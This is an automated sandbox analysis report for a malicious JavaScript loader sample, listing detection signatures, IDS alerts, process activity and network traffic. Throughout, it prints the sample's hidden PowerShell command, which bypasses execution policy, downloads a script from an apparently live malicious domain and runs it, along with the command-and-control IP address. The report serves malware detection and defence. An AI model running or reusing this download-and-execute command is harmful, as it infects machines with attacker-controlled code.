Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7hCWDvuinz.js

Overview

General Information

Sample name:7hCWDvuinz.js
renamed because original name is a hash value
Original sample name:2500f98e30ed3f862562b0009d9a86dbeba9a6a98decbd4d0ca464fb2d7fed2f.js
Analysis ID:1576929
MD5:7edb0e1b622e9cf94985f71d13c71eb9
SHA1:efafc43b055530f6ed2cfdc69c805be6aa52be01
SHA256:2500f98e30ed3f862562b0009d9a86dbeba9a6a98decbd4d0ca464fb2d7fed2f
Tags:jsmbuzy3yvzw3r-topuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Bypasses PowerShell execution policy
Deletes itself after installation
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries Google from non browser process on port 80
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 6568 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", ProcessId: 6568, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6568, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", ProcessId: 5348, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6568, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", ProcessId: 5348, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", ProcessId: 6568, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6568, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", ProcessId: 5348, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T18:22:17.543810+010020570631A Network Trojan was detected192.168.2.44973145.61.137.7180TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T18:22:17.543810+010020577431A Network Trojan was detected192.168.2.44973145.61.137.7180TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 7hCWDvuinz.jsReversingLabs: Detection: 15%
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1941799603.0000020E81AA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1941799603.0000020E81AA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1942615351.0000020E83931000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: 7hCWDvuinz.jsArgument value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw']Go to definition
Source: 7hCWDvuinz.jsArgument value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw', '"Scripting.FileSystemObject"']Go to definition
Source: 7hCWDvuinz.jsReturn value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw', '"Scripting.FileSystemObject"']Go to definition
Source: 7hCWDvuinz.jsReturn value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw', '"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.4:49731 -> 45.61.137.71:80
Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49731 -> 45.61.137.71:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.137.71 45.61.137.71
Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mbuzy3yvzw3r.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mbuzy3yvzw3r.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: mbuzy3yvzw3r.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbuzy3yvzw3r.top
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbuzy3yvzw3r.top/1.php?s=mints13
Source: powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1942671396.0000020E851CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E848A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E8487F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E8488C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E848B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E8489A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1942671396.0000020E851CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83CEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1958536023.0000020E93C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83CEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000001.00000002.1942671396.0000020E851CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83EB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000001.00000002.1958536023.0000020E93C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
Source: powershell.exe, 00000001.00000002.1942671396.0000020E8489A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000001.00000002.1942671396.0000020E83EB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: 7hCWDvuinz.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.expl.evad.winJS@4/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esmmuxr4.xs1.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 7hCWDvuinz.jsReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
